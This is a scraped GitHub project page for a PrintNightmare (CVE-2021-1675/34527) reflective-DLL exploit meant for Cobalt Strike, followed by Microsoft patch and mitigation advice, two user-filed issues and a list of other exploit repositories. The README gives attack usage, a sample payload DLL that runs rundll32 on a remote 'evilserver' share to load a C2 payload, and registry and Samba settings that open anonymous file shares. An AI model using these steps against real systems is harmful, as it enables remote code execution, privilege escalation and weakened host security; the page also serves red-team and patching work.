PrintNightmare exploit

Overview

PrintNightmare exploit

CVE-2021-1675 / CVE-2021-34527 exploit.

Reflective Dll implementation of the PrintNightmare PoC by Cornelis de Plaa (@Cneelis). The exploit was originally created by Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370).

  • It can be used as Remote Code Execution (RCE) exploit (screenshot 1),
  • It can be used for Privilege Escalation (screenshot 2).

This implementation has some advantages compared to other public exploits:

  • It uses MS-PAR protocol instead of MS-RPRN (credits @cube0x0).
  • It is in Reflective DLL form, so can be used directly from Cobaltstrike or other C2 framework.
  • It automatically finds the path of the printer driver.

Usage

Within Cobaltstrike Beacon console:

PrintNightmare [target ip or hostname] [UNC path to payload Dll] [optional domain] [optional username] [optional password]

The payload DLL is started by spoolsv.exe (print spool service) from DllMain and should thus avoid API calls which require synchronisation to avoid deadlocks. We recommend to let this payload DLL perform a CreateProcess call to something like this:

void NothingToSeeHere() {
	STARTUPINFO sui;
	PROCESS_INFORMATION pi;

	RtlZeroMemory(&sui, sizeof(sui));
	RtlZeroMemory(&pi, sizeof(pi));
	sui.cb = sizeof(sui);

	GetStartupInfo(&sui);
	LPCWSTR lpwApplicationName = L"C:\\Windows\\System32\\rundll32.exe";
	LPWSTR lpwCommandLine = (LPWSTR)L"C:\\Windows\\System32\\rundll32.exe \\\\evilserver\\thankyou\\c2payload.dll,MyExport";

	if (!CreateProcess(lpwApplicationName, lpwCommandLine, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &sui, &pi)) {
		return;
	}

	CloseHandle(pi.hProcess);
	CloseHandle(pi.hThread);

	return;
}

Screenshot 1: using this exploit for RCE

Screenshot 2: using this exploit for LPE

SMB server configuration

Source: https://github.com/cube0x0/CVE-2021-1675#smb-configuration

Easiest way to host payloads is to use samba and modify /etc/samba/smb.conf to allow anonymous access:

[global]
     map to guest = Bad User
     server role = standalone server
     usershare allow guests = yes
     idmap config * : backend = tdb
     smb ports = 445
[smb]
     comment = Samba
     path = /tmp/
     guest ok = yes
     read only = no
     browsable = yes
     force user = smbuser

From windows it's also possible:

mkdir C:\share
icacls C:\share\ /T /grant Anonymous logon:r
icacls C:\share\ /T /grant Everyone:r
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
# Reboot

Compile instructions:

This project is written in C and assembly. You can use Visual Studio to compile it from source. We are not releasing binaries, so you will have to compile yourself.

Mitigation

In July 2021 Microsoft released an emergency update to fix the PrintNightmare vulnerability (CVE-2021-34527). Make sure you run Windows update and install the following update:

  • Version 21H1, 20H1, 2004 – KB5004945 (Build 19043.1083).
  • Version 1909 – KB5004946 (Build 18363.1646).
  • Version 1809 and Windows Server 2019 – KB5004947 (Build 17763.2029).
  • Version 1803 – KB5004949
  • Version 1507 – KB5004950.
  • Windows 8.1 and Windows Server 2012 – KB5004954 and KB5004958 (security only).
  • Windows 7 SP1 and Windows Server 2008 R2 SP1 – KB5004953 and KB5004951 (security only)
  • Windows Server 2008 SP2 – KB5004955 and KB5004959 (security only).

For more information, see Microsoft guidance:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527

This patch also offers the ability to prevent non-administrators from installing any print drivers on a print server (incl. signed drivers), by configuring the “RestrictDriverInstallationToAdministrators” registry value. For information on this option, see:

https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7

Other option to mitigate the PrintNightmare vulnerability includes:

  • Disable Print Spooler service‍ (on Domain Controllers & non-print servers)‍.
  • Disable inbound remote printing through Group Policy.
  • Block inbound connectivity using a firewall.
  • Ensure Point and Print installation prompts are enabled.
Issues
  • PrintNightmare.dll crashes

    PrintNightmare.dll crashes

    Hi!

    I keep getting heap corruption errors in my lab machine while trying to launch the exploit through Beacon. I think this might be a matter of compiling and therefore I've tried to compile the binary in both VS2022 and VS2019, trying both /MD and /MT runtime libraries. I'm not too familiar with debugging C programs so this is the best I can do for now.

    So, what's the specific setup needed to compile the binary?

    The error from Windows log:

    Faulting application name: rundll32.exe, version: 10.0.19041.746, time stamp: 0xfb4a9a6b
    Faulting module name: ntdll.dll, version: 10.0.19041.1466, time stamp: 0xe2f8ca76
    Exception code: 0xc0000374
    Fault offset: 0x00000000000ff199
    Faulting process ID: 0xecc
    Faulting application start time: 0x01d83786454eec85
    Faulting application path: C:\Windows\system32\rundll32.exe
    Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
    Report ID: 88cab659-788c-40e2-9047-4feaa5c7dd68
    Faulting package full name: 
    Faulting package-relative application ID: 
    
    opened by 65535a 0
  • Some minor hygiene issues on resource management

    Some minor hygiene issues on resource management

    These are mostly hygiene issues than actual bugs. Resource allocations will be freed at process exit anyway. But the code takes care to release resources and so just noting them. Code may be copy/pasted into other frameworks where resource hygiene may matter more.

    1. The call to CreateBindingHandle initializes bHandle. The CleanUp routine should call RpcBindingFree on this resource.

    Allocated here: https://github.com/outflanknl/PrintNightmare/blob/8975bbbf0bb367855842afc9fad80b87e334bfdb/SOURCE/PrintNightmare/PrintNightmare/PrintNightmare.c#L193 and here: https://github.com/outflanknl/PrintNightmare/blob/8975bbbf0bb367855842afc9fad80b87e334bfdb/SOURCE/PrintNightmare-rDll/PrintNightmare/ReflectiveDll.c#L298

    2. Should check for failed allocation before writing:

    	container_info.Level = 2;
    !	container_info.DriverInfo.Level2 = (DRIVER_INFO_2*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(DRIVER_INFO_2));   /// check for failed allocation
    	container_info.DriverInfo.Level2->cVersion = 3;
    

    This is both in the reflective and non-reflective cases: https://github.com/outflanknl/PrintNightmare/blob/8975bbbf0bb367855842afc9fad80b87e334bfdb/SOURCE/PrintNightmare/PrintNightmare/PrintNightmare.c#L214

    https://github.com/outflanknl/PrintNightmare/blob/8975bbbf0bb367855842afc9fad80b87e334bfdb/SOURCE/PrintNightmare-rDll/PrintNightmare/ReflectiveDll.c#L305

    3. Should free memory from call to Utf8ToUtf16 in CleanUp

    https://github.com/outflanknl/PrintNightmare/blob/8975bbbf0bb367855842afc9fad80b87e334bfdb/SOURCE/PrintNightmare-rDll/PrintNightmare/ReflectiveDll.c#L245

    4. Code inconsistently switches from MAX_BUF to MAX_PATH

    LPWSTR GetDriverPath(IN LPWSTR lpwTarget) {
    ...
    	WCHAR wcKeyName[MAX_BUF] = { 0 };
    	DWORD dwNamelen = MAX_BUF;
    ...
    		if (lResult == 0) {
    			for (DWORD i = 0; ; i++) {
    				RtlZeroMemory(wcKeyName, sizeof(wcKeyName));
    				lResult = RegEnumKeyEx(hSubKeyHandle, i, wcKeyName, &dwNamelen, NULL, NULL, NULL, NULL);
    				if (StrStrIW(wcKeyName, L"ntprint.inf_amd64")) {
    					wcscpy_s(lpwDriverPath, MAX_BUF, L"C:\\Windows\\System32\\DriverStore\\FileRepository\\");
    					wcscat_s(lpwDriverPath, MAX_BUF, wcKeyName);
    					wcscat_s(lpwDriverPath, MAX_BUF, L"\\Amd64\\UNIDRV.DLL");
    					wprintf(L"[>] pDriverPath:  -> %s\n\n", lpwDriverPath);
    					break;
    				}
    
    				if (lResult == ERROR_NO_MORE_ITEMS) {
    					break;
    				}
    
    !				dwNamelen = MAX_PATH;  //changed from MAX_BUF to MAX_PATH?
    			}
    		}
    	}
    

    https://github.com/outflanknl/PrintNightmare/blob/8975bbbf0bb367855842afc9fad80b87e334bfdb/SOURCE/PrintNightmare-rDll/PrintNightmare/ReflectiveDll.c#L167

    opened by JohnLaTwC 0
Owner
Outflank B.V.
Clear advice with a hacker mindset. Red Teaming - Digital Attack Simulation - Incident Detection and Response
Outflank B.V.
Some hypervisor research notes. There is also a useful exploit template that you can use to verify / falsify any assumptions you may make while auditing code, and for exploit development.

Introduction Over the past few weeks, I've been doing some hypervisor research here and there, with most of my focus being on PCI device emulation cod

Faith 123 Jun 30, 2022
collection of C/C++ programs that try to get compilers to exploit undefined behavior

------------------------------------------------------------------------------- UB Canaries: A collection of C/C++ programs that detect undefined beh

John Regehr 161 Jul 20, 2022
Demo exploit code for CVE-2020-27904, a tfp0 bug.

xattr-oob-swap CVE-2020-27904: a tfp0 bug for macOS 10.15.x and below. Demo exploit code for my talk at BlackHat ASIA 2021. The vulnerability has been

null 66 Jun 14, 2022
Exploit to SYSTEM for CVE-2021-21551

CVE-2021-21551 Exploit to SYSTEM for CVE-2021-21551 SpoolPrinter Privesc using SeImpersonatePrivileges was made thanks to

null 237 Jul 27, 2022
a reliable C based exploit for CVE-2021-3560.

CVE-2021-3560 a reliable C based exploit for CVE-2021-3560. Summary: Yestreday i stumbled upon this blog post by Kevin Backhouse (discovered this vuln

hakivvi 34 Jun 21, 2022
Exploit allowing you to read registry hives as non-admin on Windows 10 and 11

HiveNightmare aka SeriousSam, or now CVE-2021–36934. Exploit allowing you to read any registry hives as non-admin. What is this? An zero day exploit f

Kevin Beaumont 598 Aug 3, 2022
This is an exploit for an uninitialized free in nvme:nvme_map_prp()

scavenger This is an exploit for an uninitialized free in nvme:nvme_map_prp(). For more information, see the writeup the slides for the talk in Blackh

Hadas 47 Jul 6, 2022
Mario Kart 7 semi-primary exploit for the Nintendo 3DS.

kartdlphax kartdlphax is a semiprimary exploit for the download play mode of Mario Kart 7. It can be used to run an userland payload in an unmodified

PabloMK7 38 Jul 9, 2022
🎻 Automatic Exploit Generation using symbolic execution

S2E Library This repository contains all the necessary components to build libs2e.so. This shared library is preloaded in QEMU to enable symbolic exec

ᴀᴇꜱᴏᴘʜᴏʀ 29 Jan 10, 2022
My exploit for CVE-2021-40449, a Windows LPE via a UAF in win32kfull!GreResetDCInternal.

CVE-2021-40449 My exploit for CVE-2021-40449, a Windows LPE via a UAF in win32kfull!GreResetDCInternal. short wu along with the UAF vulnerabilty other

hakivvi 30 Jul 27, 2022
Make CVE-2020-0668 exploit work for version < win10 v1903 and version >= win10 v1903

CVE-2020-0668 Made CVE-2020-0668 exploit work for version < win10 v1903 and version >= win10 v1903 Diaghub Exploit (< v1903) powershell exploit works

null 13 Dec 15, 2021
Exploit for CVE-2021-40449

CVE-2021-40449 More info here: https://kristal-g.github.io/2021/11/05/CVE-2021-40449_POC.html Compiling I did a bit of a hack with the MinHook library

null 49 Jul 27, 2022
A tool for [(semi-){un-(tethered jailbreak)}] of iOS 10.3.x 32-bit devices with checkm8 BootROM exploit.

p0insettia A tool for [(semi-){un-(tethered jailbreak)}] of iOS 10.3.4 32-bit devices iPhone 5 with checkm8 BootROM exploit. Note All at your own risk

dora2ios 26 Jul 23, 2022
Exploit for CVE-2021-30807

Write up is here: https://jsherman212.github.io/2021/11/28/popping_ios14_with_iomfb.html Exploit for CVE-2021-30807. If you really want to build a jai

Justin Sherman 121 Jul 20, 2022
Exploit for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE)

CallbackHell Exploit for CVE-2021-40449 (Win32k - LPE) CallbackHell Description Technical Writeup PoC References Description CVE-2021-40449 is a use-a

Oliver Lyak 415 Jul 28, 2022
Gex is an iOS 14.7 jailbreak using CVE-2021-30807 IOMFB exploit

Gex is an iOS 14.7 jailbreak using CVE-2021-30807 IOMFB exploit rest of this readme is from jsherman212's exploit repo and probably stuff that is abou

Connor 5 Apr 19, 2022
HXPCTF Trusty User Diary exploit & writeup

hxp_trusty_user_diary HXPCTF Trusty User Diary exploit & writeup OUTPUT ~ $ ~ $ id uid=1000(ctf) gid=1000 groups=1000 ~ $ /exploit Busybox page allo

Emrah Demir 1 Feb 3, 2022
A simple Roblox exploit written in C++ Everything in the C++ file is original work besides the dependencies, free for you to use.

headhunter A simple Roblox exploit written in C++ Everything in the C++ file is original work besides the dependencies, free for you to use. This code

ster ster 37 Aug 3, 2022